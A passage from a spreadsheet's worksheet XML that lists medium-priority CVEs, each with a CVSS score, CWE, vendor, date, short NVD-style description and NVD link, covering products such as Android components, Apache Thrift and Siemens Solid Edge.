        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28613</t>
        </is>
      </c>
    </row>
    <row r="2947">
      <c r="A2947" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28626</t>
        </is>
      </c>
      <c r="C2947" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2947" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2947" s="5" t="inlineStr"/>
      <c r="F2947" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2947" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2947" s="5" t="inlineStr"/>
      <c r="I2947" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2947" s="5" t="inlineStr"/>
      <c r="K2947" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L2947" s="5" t="inlineStr">
        <is>
          <t>In onCreate of SetupPassthroughActivity.java, there is a possible way to launch arbitrary activity due to Intent redirection . This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="M2947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28626</t>
        </is>
      </c>
    </row>
    <row r="2948">
      <c r="A2948" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28656</t>
        </is>
      </c>
      <c r="C2948" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2948" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2948" s="5" t="inlineStr"/>
      <c r="F2948" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2948" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2948" s="5" t="inlineStr"/>
      <c r="I2948" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2948" s="5" t="inlineStr"/>
      <c r="K2948" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="L2948" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of DeviceAdminAdd.java, there is a possible way to an overlay due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="M2948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28656</t>
        </is>
      </c>
    </row>
    <row r="2949">
      <c r="A2949" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30819</t>
        </is>
      </c>
      <c r="C2949" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2949" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2949" s="5" t="inlineStr"/>
      <c r="F2949" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2949" s="5" t="inlineStr"/>
      <c r="H2949" s="5" t="inlineStr"/>
      <c r="I2949" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2949" s="5" t="inlineStr"/>
      <c r="K2949" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2949" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, iTop has a reflected Cross-Site Scripting (XSS) vulnerability in its dashboard revert functionality with the parameter dashboard_id in /pages/ajax.render.php. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M2949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30819</t>
        </is>
      </c>
    </row>
    <row r="2950">
      <c r="A2950" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39883</t>
        </is>
      </c>
      <c r="C2950" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2950" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2950" s="5" t="inlineStr"/>
      <c r="F2950" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2950" s="5" t="inlineStr"/>
      <c r="H2950" s="5" t="inlineStr">
        <is>
          <t>opentelemetry:opentelemetry</t>
        </is>
      </c>
      <c r="I2950" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J2950" s="5" t="inlineStr"/>
      <c r="K2950" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L2950" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. From 1.15.0 to 1.42.0, the fix for CVE-2026-24051 changed the Darwin ioreg command to use an absolute path but left the BSD kenv command using a bare name, allowing the same PATH hijacking attack on BSD and Solaris platforms. This vulnerability is fixed in 1.43.0.</t>
        </is>
      </c>
      <c r="M2950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39883</t>
        </is>
      </c>
    </row>
    <row r="2951">
      <c r="A2951" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40542</t>
        </is>
      </c>
      <c r="C2951" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2951" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2951" s="5" t="inlineStr"/>
      <c r="F2951" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2951" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2951" s="5" t="inlineStr">
        <is>
          <t>apache:httpclient</t>
        </is>
      </c>
      <c r="I2951" s="5" t="inlineStr">
        <is>
          <t>2026-04-22</t>
        </is>
      </c>
      <c r="J2951" s="5" t="inlineStr"/>
      <c r="K2951" s="5" t="inlineStr">
        <is>
          <t>CWE-304, CWE-325</t>
        </is>
      </c>
      <c r="L2951" s="5" t="inlineStr">
        <is>
          <t>Missing critical step in authentication in Apache HttpClient 5.6 allows an attacker to cause the client to accept SCRAM-SHA-256 authentication without proper mutual authentication verification. Users are recommended to upgrade to version 5.6.1, which fixes this issue.</t>
        </is>
      </c>
      <c r="M2951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40542</t>
        </is>
      </c>
    </row>
    <row r="2952">
      <c r="A2952" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41605</t>
        </is>
      </c>
      <c r="C2952" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2952" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2952" s="5" t="inlineStr"/>
      <c r="F2952" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2952" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2952" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I2952" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J2952" s="5" t="inlineStr"/>
      <c r="K2952" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2952" s="5" t="inlineStr">
        <is>
          <t>Integer Overflow or Wraparound vulnerability in Apache Thrift.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41605</t>
        </is>
      </c>
    </row>
    <row r="2953">
      <c r="A2953" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43869</t>
        </is>
      </c>
      <c r="C2953" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2953" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2953" s="5" t="inlineStr"/>
      <c r="F2953" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2953" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2953" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I2953" s="5" t="inlineStr">
        <is>
          <t>2026-05-05</t>
        </is>
      </c>
      <c r="J2953" s="5" t="inlineStr"/>
      <c r="K2953" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-297</t>
        </is>
      </c>
      <c r="L2953" s="5" t="inlineStr">
        <is>
          <t>Improper Validation of Certificate with Host Mismatch vulnerability in Apache Thrift.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43869</t>
        </is>
      </c>
    </row>
    <row r="2954">
      <c r="A2954" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44185</t>
        </is>
      </c>
      <c r="C2954" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2954" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2954" s="5" t="inlineStr"/>
      <c r="F2954" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2954" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2954" s="5" t="inlineStr">
        <is>
          <t>apache:http_server</t>
        </is>
      </c>
      <c r="I2954" s="5" t="inlineStr">
        <is>
          <t>2026-06-08</t>
        </is>
      </c>
      <c r="J2954" s="5" t="inlineStr"/>
      <c r="K2954" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-126</t>
        </is>
      </c>
      <c r="L2954" s="5" t="inlineStr">
        <is>
          <t>Buffer Over-read vulnerability in Apache HTTP Server via outbound OCSP requests to an attacker controlled OCSP server
This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67.
Users are recommended to upgrade to version 2.4.68, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44185</t>
        </is>
      </c>
    </row>
    <row r="2955">
      <c r="A2955" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45528</t>
        </is>
      </c>
      <c r="C2955" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2955" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2955" s="5" t="inlineStr"/>
      <c r="F2955" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2955" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2955" s="5" t="inlineStr"/>
      <c r="I2955" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2955" s="5" t="inlineStr"/>
      <c r="K2955" s="5" t="inlineStr">
        <is>
          <t>CWE-926</t>
        </is>
      </c>
      <c r="L2955" s="5" t="inlineStr">
        <is>
          <t>In getManageSpaceActivityIntent of StorageManagerService.java, there is a possible LaunchAnyWhere chain due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="M2955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45528</t>
        </is>
      </c>
    </row>
    <row r="2956">
      <c r="A2956" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47878</t>
        </is>
      </c>
      <c r="C2956" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2956" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2956" s="5" t="inlineStr"/>
      <c r="F2956" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2956" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H2956" s="5" t="inlineStr">
        <is>
          <t>broadcom:spring_batch</t>
        </is>
      </c>
      <c r="I2956" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2956" s="5" t="inlineStr"/>
      <c r="K2956" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L2956" s="5" t="inlineStr">
        <is>
          <t>DefaultExecutionContextSerializer, used by default in Spring Batch's JDBC job repository, passes Base64-decoded bytes directly to ObjectInputStream.readObject() without an ObjectInputFilter that restricts types to a trusted class allowlist.
Spring Batch 6.0.0 - 6.0.4
Spring Batch 5.2.6 and earlier</t>
        </is>
      </c>
      <c r="M2956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47878</t>
        </is>
      </c>
    </row>
    <row r="2957">
      <c r="A2957" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48098</t>
        </is>
      </c>
      <c r="C2957" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2957" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2957" s="5" t="inlineStr"/>
      <c r="F2957" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2957" s="5" t="inlineStr"/>
      <c r="H2957" s="5" t="inlineStr"/>
      <c r="I2957" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2957" s="5" t="inlineStr"/>
      <c r="K2957" s="5" t="inlineStr">
        <is>
          <t>CWE-250, CWE-78</t>
        </is>
      </c>
      <c r="L2957" s="5" t="inlineStr">
        <is>
          <t>NexTor IP Changer is a command-line tool that leverages the Tor network to periodically rotate a user's IP address. Versions prior to 2.0.0 execute privileged system commands using `sudo` and `shell=True` directly inside application logic. In environments where passwordless sudo (`NOPASSWD`) is enabled, privileged commands may execute silently without explicit user confirmation. Version 2.0.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M2957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48098</t>
        </is>
      </c>
    </row>
    <row r="2958">
      <c r="A2958" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49314</t>
        </is>
      </c>
      <c r="C2958" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2958" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2958" s="5" t="inlineStr"/>
      <c r="F2958" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2958" s="5" t="inlineStr"/>
      <c r="H2958" s="5" t="inlineStr"/>
      <c r="I2958" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2958" s="5" t="inlineStr"/>
      <c r="K2958" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2958" s="5" t="inlineStr">
        <is>
          <t>OOB write vulnerability in the rendering and composition module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="M2958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49314</t>
        </is>
      </c>
    </row>
    <row r="2959">
      <c r="A2959" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50058</t>
        </is>
      </c>
      <c r="C2959" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2959" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2959" s="5" t="inlineStr"/>
      <c r="F2959" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2959" s="5" t="inlineStr"/>
      <c r="H2959" s="5" t="inlineStr">
        <is>
          <t>siemens:solid_edge_se2025, siemens:solid_edge_se2026</t>
        </is>
      </c>
      <c r="I2959" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2959" s="5" t="inlineStr"/>
      <c r="K2959" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2959" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Solid Edge SE2025 (All versions &lt; V225.0 Update 15), Solid Edge SE2026 (All versions &lt; V226.0 Update 7). The affected applications contains an out of bounds read vulnerability while parsing specially crafted DFT files. This could allow an attacker to execute code in the context of the current process.</t>
        </is>
      </c>
      <c r="M2959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50058</t>
        </is>
      </c>
    </row>
    <row r="2960">
      <c r="A2960" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50059</t>
        </is>
      </c>
      <c r="C2960" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2960" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2960" s="5" t="inlineStr"/>
      <c r="F2960" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2960" s="5" t="inlineStr"/>
      <c r="H2960" s="5" t="inlineStr">
        <is>
          <t>siemens:solid_edge_se2025, siemens:solid_edge_se2026</t>
        </is>
      </c>
      <c r="I2960" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2960" s="5" t="inlineStr"/>
      <c r="K2960" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2960" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Solid Edge SE2025 (All versions &lt; V225.0 Update 15), Solid Edge SE2026 (All versions &lt; V226.0 Update 7). The affected applications contains an out of bounds write vulnerability while parsing specially crafted DFT files. This could allow an attacker to execute code in the context of the current process.</t>
        </is>
      </c>
      <c r="M2960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50059</t>
        </is>
      </c>
    </row>
    <row r="2961">
      <c r="A2961" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50060</t>
        </is>
      </c>
      <c r="C2961" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2961" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2961" s="5" t="inlineStr"/>
      <c r="F2961" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2961" s="5" t="inlineStr"/>
      <c r="H2961" s="5" t="inlineStr">
        <is>
          <t>siemens:solid_edge_se2025, siemens:solid_edge_se2026</t>
        </is>
      </c>
      <c r="I2961" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2961" s="5" t="inlineStr"/>
      <c r="K2961" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2961" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Solid Edge SE2025 (All versions &lt; V225.0 Update 15), Solid Edge SE2026 (All versions &lt; V226.0 Update 7). The affected applications contain a use-after-free vulnerability that could be triggered while parsing specially crafted DFT files. This could allow an attacker to execute code in the context of the current process.</t>
        </is>
      </c>
      <c r="M2961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50060</t>
        </is>
      </c>
    </row>
    <row r="2962">
      <c r="A2962" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50061</t>
        </is>
      </c>
      <c r="C2962" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2962" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2962" s="5" t="inlineStr"/>
      <c r="F2962" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2962" s="5" t="inlineStr"/>
      <c r="H2962" s="5" t="inlineStr">
        <is>
          <t>siemens:solid_edge_se2025, siemens:solid_edge_se2026</t>
        </is>
      </c>
      <c r="I2962" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2962" s="5" t="inlineStr"/>
      <c r="K2962" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2962" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Solid Edge SE2025 (All versions &lt; V225.0 Update 15), Solid Edge SE2026 (All versions &lt; V226.0 Update 7). The affected applications contain a use-after-free vulnerability that could be triggered while parsing specially crafted DFT files. This could allow an attacker to execute code in the context of the current process.</t>
        </is>
      </c>
      <c r="M2962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50061</t>
        </is>
      </c>
    </row>
    <row r="2963">
      <c r="A2963" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50062</t>
        </is>
      </c>
      <c r="C2963" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2963" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2963" s="5" t="inlineStr"/>
      <c r="F2963" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2963" s="5" t="inlineStr"/>
      <c r="H2963" s="5" t="inlineStr">
        <is>
          <t>siemens:solid_edge_se2025, siemens:solid_edge_se2026</t>
        </is>
      </c>
      <c r="I2963" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2963" s="5" t="inlineStr"/>
      <c r="K2963" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2963" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Solid Edge SE2025 (All versions &lt; V225.0 Update 15), Solid Edge SE2026 (All versions &lt; V226.0 Update 7). The affected applications contains an out of bounds read vulnerability while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.</t>
        </is>
      </c>
      <c r="M2963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50062</t>
        </is>
      </c>
    </row>
    <row r="2964">
      <c r="A2964" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50063</t>
        </is>
      </c>
      <c r="C2964" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2964" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2964" s="5" t="inlineStr"/>
      <c r="F2964" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2964" s="5" t="inlineStr"/>
      <c r="H2964" s="5" t="inlineStr">
        <is>
          <t>siemens:solid_edge_se2025, siemens:solid_edge_se2026</t>
        </is>
      </c>
      <c r="I2964" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2964" s="5" t="inlineStr"/>
      <c r="K2964" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2964" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Solid Edge SE2025 (All versions &lt; V225.0 Update 15), Solid Edge SE2026 (All versions &lt; V226.0 Update 7). The affected applications contains an out of bounds read vulnerability while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.</t>
        </is>
      </c>
      <c r="M2964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50063</t>
        </is>
      </c>
    </row>
    <row r="2965">
      <c r="A2965" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50064</t>
        </is>
      </c>
      <c r="C2965" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2965" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2965" s="5" t="inlineStr"/>
      <c r="F2965" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2965" s="5" t="inlineStr"/>
      <c r="H2965" s="5" t="inlineStr">
        <is>
          <t>siemens:solid_edge_se2025, siemens:solid_edge_se2026</t>
        </is>
      </c>
      <c r="I2965" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2965" s="5" t="inlineStr"/>
      <c r="K2965" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2965" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Solid Edge SE2025 (All versions &lt; V225.0 Update 15), Solid Edge SE2026 (All versions &lt; V226.0 Update 7). The affected applications contains an out of bounds write vulnerability while parsing specially crafted PSM files. This could allow an attacker to execute code in the context of the current process.</t>
        </is>
      </c>
      <c r="M2965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50064</t>
        </is>
      </c>
    </row>
    <row r="2966">
      <c r="A2966" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54737</t>
        </is>
      </c>
      <c r="C2966" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2966" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2966" s="5" t="inlineStr"/>
      <c r="F2966" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2966" s="5" t="inlineStr"/>
      <c r="H2966" s="5" t="inlineStr"/>
      <c r="I2966" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2966" s="5" t="inlineStr"/>
      <c r="K2966" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L2966" s="5" t="inlineStr">
        <is>
          <t>@phun-ky/defaults-deep is a library like lodash defaultsDeep with array preservation and no lodash dependency. Prior to 2.0.5, defaultsDeep() recursively merges user-supplied objects without filtering proto, constructor, and prototype, allowing properties to be written to Object.prototype. This issue is fixed in version 2.0.5.</t>
        </is>
      </c>
      <c r="M2966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54737</t>
        </is>
      </c>
    </row>
    <row r="2967">
      <c r="A2967" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55538</t>
        </is>
      </c>
      <c r="C2967" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2967" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2967" s="5" t="inlineStr"/>
      <c r="F2967" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2967" s="5" t="inlineStr"/>
      <c r="H2967" s="5" t="inlineStr"/>
      <c r="I2967" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2967" s="5" t="inlineStr"/>
      <c r="K2967" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2967" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.51, praisonai serve agents parses config["api_key"] but _create_agents_app() does not authenticate POST /agents or POST /agents/{agent_name}. Missing or incorrect bearer and X-API-Key values still reach agent execution. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M2967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55538</t>
        </is>
      </c>
    </row>
    <row r="2968">
      <c r="A2968" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61409</t>
        </is>
      </c>
      <c r="C2968" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2968" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2968" s="5" t="inlineStr"/>
      <c r="F2968" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G2968" s="5" t="inlineStr"/>
      <c r="H2968" s="5" t="inlineStr"/>
      <c r="I2968" s="5" t="inlineStr">
        <is>
